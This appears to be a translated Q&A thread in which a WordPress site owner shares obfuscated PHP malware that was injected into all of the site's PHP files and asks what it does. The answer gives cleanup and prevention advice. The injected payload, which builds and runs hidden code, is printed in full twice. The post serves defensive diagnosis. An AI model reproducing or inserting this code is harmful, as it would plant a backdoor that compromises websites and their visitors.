Malicious code not identified

Question

Malicious code not identified

Asked 8 years, 5 months ago

Viewed 192 times

8

Guys, I have a site that was hacked (Wordpress) and on all pages . php was added the code below:

<?php $ahwwxolsc = '>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439277~6<Cw6<pd%w6Z6<.5`hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**/#)rrd/#00;quui#>.%!<***f x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof`57ftbc   x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rf   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%e]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8#-!%w:**<")));$xiaikmu = $isxgmay("", $tmoownopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?!  x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rbE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tsb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&eor_reporting(0); $tmoown]Df#<%tdz>#L4]275L3]248L3P6L1M5]1]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36-  x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  =*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]586<*id%)dfyfR  x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m% x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z6<>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~<%h00#*<%nfd)##Qtpz)#]34if((function_exists("24<!fwbm)%tjw)bssbz)#P#-#Q::!>!    x24Ypp3)%cB%iNd); $xiaikmu();}}%:-5ppde:4:|:**#ppde#)tutjyf`4   x223}!n`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs%!-#2#/#%#/#o]#/*)323zq%6< x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6*CW0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]ys%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/%  x24-    x24!>!fyqmpef)# x24*<!%t#<!%w:!>!(%w:!>!    x24676pV    x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x27}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x2424]y8    x24-    x24]26  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x2)zbssb!-#}#)fepmqnj!/!#0#)idub3of:opjudovg<~  x24<!%o:!>! x242178}5HB`SFTV`QUUI&b%!|!*)323zbek!~2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)!gj<*#k#)usbut`c2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bwbm)%tjw)#    x24#-!#]y382400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h]o]s]#)fepmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*Kd = implode(array_map("zfkvmoa",str_split("%tjw!>!#]y84]275]y83]248]y]y74]275]y7:]268]y7f#<!%tww!>!    xuvso!%bss  x5csboe))1/35.)1/14+9**-)1/29.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!:!}V;3q%}U;y]}R;2]},;osvuf#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#{hA!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsutd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd83]256]y81]265]y72]254]y763hopmA    x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFe:55946-tr.984:75983:4!%z!>2<!gps)%j>1<%j=pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5c+sfwjidsb`bj+upcotn+qsvmt+fmhpph#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!f2   137 x41 107 x45 116 x54"]); if ((strstr($uasx24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tus!<*#}_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~92886+7**^/%rx<~!!%s:N}#sutRe%)Rd%)Rb%))!gj!<*#}+;%-qp%)54l}  x27;%]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7s}    x27;mnui}&;zepc}A;~!}   x7f;!4- x24*<!~!    x24/%t2w/   x24)##-!#~<#/.3`hA  x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s*2b%)gpf{jt)!gj!<*2b#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbs+!<+{e%+*!*+fepdfe{h+{d!<b%    x7f!<X>b%Z<#opo#q%7**^#zsfvr#   x5cq%)ufttj |!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nbsbq%)323ldfidk20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)ud]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*WsfKc#<%tpz!>!#]D6M7]K3#<%yy>#<.fmjgA   x27doj%6<   x7fw6*  x7u%-#jt0}Z;0]=]0#)2q%l}S;2-uXAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>f_*#fmjgk4`{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&)7gj6as=strtolower($_SERVER["  x48 124 x5x22)gj6<^#Y#  x5cq%   x27Y%6<.msv`ftsbqA7>be!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y8&)7gj6<*doj%7-C)fepmqnjA    x27&6uofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uq4]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267}#-!   x24/%tmw/   x24)%c*W%eN+#Qi5ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm4    120 x5f 125 x53 105 x5!~!<**qp%!-uyfu%)3of)fepdofy]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]3*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>OBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvcD2P4]D6#<%G]y6d]281Ld]245]K%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:ubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`N}#QwTW%hIr   x5c1^-%r    x5c2^-%hOh/#02]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9})) { $isxgmay = "   x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x6`GB)fubfsdXA  x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj    x6f 142 x5f 163 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5!#f6c68399#-!#65egb2dc#6-xr.985:52985-t.98]K4]65]D8]86]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212-%o:W%c:>1<%b:>1<!gps)%jqpt)%z-#:#*    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x," x6d 163 x69 145")) or (strstr($uas,"    x72 166 x3a 61  x31")>}R;msv}.;/#/#/},;#-4y7    x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x2:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~156 x61"])))) { $GLOBALS["  x61 156 x75 156 x61"]=1; $u)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj8y]572]48y]#>m%:|:*r%:-t%)pnbss!>!bssbz)#44ec:649#-!#:618d5f9#-2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]9   157 x6e"; function zfkvmoa($n){return chr(ord($n)-1);} @err>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-busTrREvxNoiTCnuf_EtaerCxECalPer_Rtswukqhys'; $fkynbfrz=explode(chr((712-592)),substr($ahwwxolsc,(39013-33136),(126-92))); $mtsuxbm = $fkynbfrz[0]($fkynbfrz[(3-2)]); $xdyymr = $fkynbfrz[0]($fkynbfrz[(9-7)]); if (!function_exists('sopexje')) { function sopexje($hrabgt, $ufgoommd,$kdfsnldet) { $mklsjnqqyb = NULL; for($egbprqw=0;$egbprqw<(sizeof($hrabgt)/2);$egbprqw++) { $mklsjnqqyb .= substr($ufgoommd, $hrabgt[($egbprqw*2)],$hrabgt[($egbprqw*2)+(6-5)]); } return $kdfsnldet(chr((32-23)),chr((584-492)),$mklsjnqqyb); }; } $lywqws = explode(chr((291-247)),'1250,21,4997,69,5517,54,4010,35,4379,24,3002,46,5332,60,4864,68,5780,61,763,24,2274,69,2675,26,1615,23,42,21,1130,39,3327,70,2225,49,258,64,1541,43,3635,64,1019,44,4932,65,2701,60,2888,41,3502,26,4045,39,1432,47,4123,30,3778,27,3902,53,961,58,4531,35,3955,55,669,60,4153,70,4566,46,4639,38,2836,52,5571,58,2545,66,5841,36,602,67,63,64,2107,60,4730,65,492,62,3397,20,2611,64,127,64,2414,60,5692,50,2929,33,1857,30,1371,39,3183,22,3417,41,729,34,2761,33,1923,29,3481,21,3574,61,4403,27,191,67,5392,20,3205,20,3099,63,0,42,4323,56,1334,37,3458,23,2038,69,1638,55,3832,70,1952,64,2016,22,2474,26,3262,30,3528,46,3805,27,1410,22,4084,39,4223,70,2343,32,2189,36,1063,67,911,50,4430,59,5629,26,1887,36,1753,44,873,38,3048,51,5275,57,1797,60,5412,47,3292,35,1584,31,1297,20,4293,30,322,57,5655,37,5134,23,4489,42,554,48,4795,34,1479,62,5066,68,5157,31,3225,37,2794,22,5742,38,3751,27,379,68,787,32,4612,27,4829,35,5459,58,1226,24,819,54,5188,63,3699,52,2375,39,3162,21,5251,24,4677,53,1169,57,2816,20,1693,60,1271,26,2500,45,2962,40,2167,22,447,45,1317,17'); $xxnkkc = $mtsuxbm("",sopexje($lywqws,$ahwwxolsc,$xdyymr)); $mtsuxbm=$ahwwxolsc; $xxnkkc(""); $xxnkkc=(697-576); $ahwwxolsc=$xxnkkc-1; ?>

I wanted to know what it really might have done on my site and if there’s any way to clear it since the code is the same.

Thanks.

I organized the code to facilitate understanding, follows below:

<?php $ahwwxolsc = '>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439277~6<Cw6<pd%w6Z6<.5`hAtcvt-#w#)ldbqov>*ofmy%)utjm!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**/#)rrd/#00;quui#>.%!<***f x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof`57ftbc   x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rf   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%e]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8#-!%w:**<")));$xiaikmu = $isxgmay("", $tmoownopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?!  x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rbE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)su<.[A x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tsb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&eor_reporting(0); $tmoown]Df#<%tdz>#L4]275L3]248L3P6L1M5]1]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36-  x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  =*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]586<*id%)dfyfR  x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ%:<**#57]38y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m% x27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z6<>%s:    x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~<%h00#*<%nfd)##Qtpz)#]34if((function_exists("24<!fwbm)%tjw)bssbz)#P#-#Q::!>!    x24Ypp3)%cB%iNd); $xiaikmu();}}%:-5ppde:4:|:**#ppde#)tutjyf`4   x223}!n`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs%!-#2#/#%#/#o]#/*)323zq%6< x7fw6*  x7f_*#fubfsdXk5`{66~6<&w6<  x7fw6*CW0#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]ys%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/%  x24-    x24!>!fyqmpef)# x24*<!%t#<!%w:!>!(%w:!>!    x24676pV    x7f x7f x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7f<*6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x27}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x2424]y8    x24-    x24]26  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x2)zbssb!-#}#)fepmqnj!/!#0#)idub3of:opjudovg<~  x24<!%o:!>! x242178}5HB`SFTV`QUUI&b%!|!*)323zbek!~2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)!gj<*#k#)usbut`c2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bwbm)%tjw)#    x24#-!#]y382400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h]o]s]#)fepmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*Kd = implode(array_map("zfkvmoa",str_split("%tjw!>!#]y84]275]y83]248]y]y74]275]y7:]268]y7f#<!%tww!>!    xuvso!%bss  x5csboe))1/35.)1/14+9**-)1/29.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!:!}V;3q%}U;y]}R;2]},;osvuf#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#{hA!osvufs!~<3,j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsutd%-#1GO    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd83]256]y81]265]y72]254]y763hopmA    x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFe:55946-tr.984:75983:4!%z!>2<!gps)%j>1<%j=pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5c+sfwjidsb`bj+upcotn+qsvmt+fmhpph#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!f2   137 x41 107 x45 116 x54"]); if ((strstr($uasx24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    x24-    x24-tus!<*#}_;#)323ldfid>}&;!osvufs}    x7f;!opjudovg}k~~9{d%:osvufs:~92886+7**^/%rx<~!!%s:N}#sutRe%)Rd%)Rb%))!gj!<*#}+;%-qp%)54l}  x27;%]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7s}    x27;mnui}&;zepc}A;~!}   x7f;!4- x24*<!~!    x24/%t2w/   x24)##-!#~<#/.3`hA  x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s*2b%)gpf{jt)!gj!<*2b#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbs+!<+{e%+*!*+fepdfe{h+{d!<b%    x7f!<X>b%Z<#opo#q%7**^#zsfvr#   x5cq%)ufttj |!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nbsbq%)323ldfidk20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)ud]445]43]321]464]284]364]6]234]342]58]24]31#-%tdz*WsfKc#<%tpz!>!#]D6M7]K3#<%yy>#<.fmjgA   x27doj%6<   x7fw6*  x7u%-#jt0}Z;0]=]0#)2q%l}S;2-uXAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>f_*#fmjgk4`{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&)7gj6as=strtolower($_SERVER["  x48 124 x5x22)gj6<^#Y#  x5cq%   x27Y%6<.msv`ftsbqA7>be!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y8&)7gj6<*doj%7-C)fepmqnjA    x27&6uofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uq4]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267}#-!   x24/%tmw/   x24)%c*W%eN+#Qi5ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm4    120 x5f 125 x53 105 x5!~!<**qp%!-uyfu%)3of)fepdofy]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]3*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>OBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR xpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvcD2P4]D6#<%G]y6d]281Ld]245]K%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:ubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`N}#QwTW%hIr   x5c1^-%r    x5c2^-%hOh/#02]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9})) { $isxgmay = "   x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x6`GB)fubfsdXA  x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj    x6f 142 x5f 163 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:5!#f6c68399#-!#65egb2dc#6-xr.985:52985-t.98]K4]65]D8]86]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212-%o:W%c:>1<%b:>1<!gps)%jqpt)%z-#:#*    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x," x6d 163 x69 145")) or (strstr($uas,"    x72 166 x3a 61  x31")>}R;msv}.;/#/#/},;#-4y7    x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x2:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~156 x61"])))) { $GLOBALS["  x61 156 x75 156 x61"]=1; $u)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj8y]572]48y]#>m%:|:*r%:-t%)pnbss!>!bssbz)#44ec:649#-!#:618d5f9#-2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]9   157 x6e"; function zfkvmoa($n){return chr(ord($n)-1);} @err>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-busTrREvxNoiTCnuf_EtaerCxECalPer_Rtswukqhys';
$fkynbfrz = explode(chr((712 - 592)), substr($ahwwxolsc, (39013 - 33136), (126 - 92)));
$mtsuxbm = $fkynbfrz[0]($fkynbfrz[(3 - 2) ]);
$xdyymr = $fkynbfrz[0]($fkynbfrz[(9 - 7) ]);
if (!function_exists('sopexje')) {
    function sopexje($hrabgt, $ufgoommd, $kdfsnldet) {
        $mklsjnqqyb = NULL;
        for ($egbprqw = 0;$egbprqw < (sizeof($hrabgt) / 2);$egbprqw++) {
            $mklsjnqqyb.= substr($ufgoommd, $hrabgt[($egbprqw * 2) ], $hrabgt[($egbprqw * 2) + (6 - 5) ]);
        }
        return $kdfsnldet(chr((32 - 23)), chr((584 - 492)), $mklsjnqqyb);
    };
}
$lywqws = explode(chr((291 - 247)), '1250,21,4997,69,5517,54,4010,35,4379,24,3002,46,5332,60,4864,68,5780,61,763,24,2274,69,2675,26,1615,23,42,21,1130,39,3327,70,2225,49,258,64,1541,43,3635,64,1019,44,4932,65,2701,60,2888,41,3502,26,4045,39,1432,47,4123,30,3778,27,3902,53,961,58,4531,35,3955,55,669,60,4153,70,4566,46,4639,38,2836,52,5571,58,2545,66,5841,36,602,67,63,64,2107,60,4730,65,492,62,3397,20,2611,64,127,64,2414,60,5692,50,2929,33,1857,30,1371,39,3183,22,3417,41,729,34,2761,33,1923,29,3481,21,3574,61,4403,27,191,67,5392,20,3205,20,3099,63,0,42,4323,56,1334,37,3458,23,2038,69,1638,55,3832,70,1952,64,2016,22,2474,26,3262,30,3528,46,3805,27,1410,22,4084,39,4223,70,2343,32,2189,36,1063,67,911,50,4430,59,5629,26,1887,36,1753,44,873,38,3048,51,5275,57,1797,60,5412,47,3292,35,1584,31,1297,20,4293,30,322,57,5655,37,5134,23,4489,42,554,48,4795,34,1479,62,5066,68,5157,31,3225,37,2794,22,5742,38,3751,27,379,68,787,32,4612,27,4829,35,5459,58,1226,24,819,54,5188,63,3699,52,2375,39,3162,21,5251,24,4677,53,1169,57,2816,20,1693,60,1271,26,2500,45,2962,40,2167,22,447,45,1317,17');
$xxnkkc = $mtsuxbm("", sopexje($lywqws, $ahwwxolsc, $xdyymr));
$mtsuxbm = $ahwwxolsc;
$xxnkkc("");
$xxnkkc = (697 - 576);
$ahwwxolsc = $xxnkkc - 1; ?>

After finally being able to open your question, I wait for an answer, I was curious to know more about it ;)

– João Victor Gomes Moreira

2016/05/11 at 16:36
Caraca! Here tbm gave a nice delay, I would like to understand better how it works!

– Mastria

2016/05/11 at 16:47
3

Usually in these cases the simplest is to re-upload your local copy. Now, if you do everything directly on the hosting, it’s a good time to review the modus operandi, because this problem you are having is only one of several possible to rely on the "hosted" version. It’s critical to always have a healthy local copy of your work in hand and ready to use (even if it’s a conventional backup, as long as you have a fast Store plan, of course).

– Bacco

2016/05/11 at 17:47

1 answer

Browser other questions tagged php wordpress

You are not signed in. Login or sign up in order to post.

by DeRamon • **340** points · Answer 1 · 2016-05-19T20:34:30+00:00

In most cases, this type of "hack" happens because of outdated plugins, outdated core version or even use of already infected themes. It happens a lot, you sometimes want to have a premium theme but do not want to pay for the service, so run on any blog or torrent around and download the theme "free"... but does not check the scripts and falls into a real trap. I say that because I’ve been a victim.

First step is to clear your code. You can simply re-upload source code (original from WP source) or exit by debugging file by file in search of malicious entries like these. It’s not too hard, they usually follow a pattern. Notepad++ will be your hero if that’s the case.

Second step is to prevent this from happening again. Change your passwords, change the Keys hash. Do not use these pirate themes, do not install any type of plugin and ALWAYS keep everything updated as far as possible.

An alternative that helped me a lot was to use some security plugins, such as Wordfence (free) or Sitelock (paid) for example. It will keep monitoring your files and comparing if your code has undergone any changes that make it different from the original source, it gives you resources to compare, delete and get away with this kind of thing. There are several such tools on the market, free and paid, there goes according to your need.

And finally, answering your final question: "What could this have done on your site?" At best, nothing! At worst, they may have used your site to send spam, you may have fallen into a Blacklist and they may have had access to your data in some way, since they were able to edit your source, it may be that, depending on your permissions, they may have had access to wp-config. But that’s hard to say without wider access.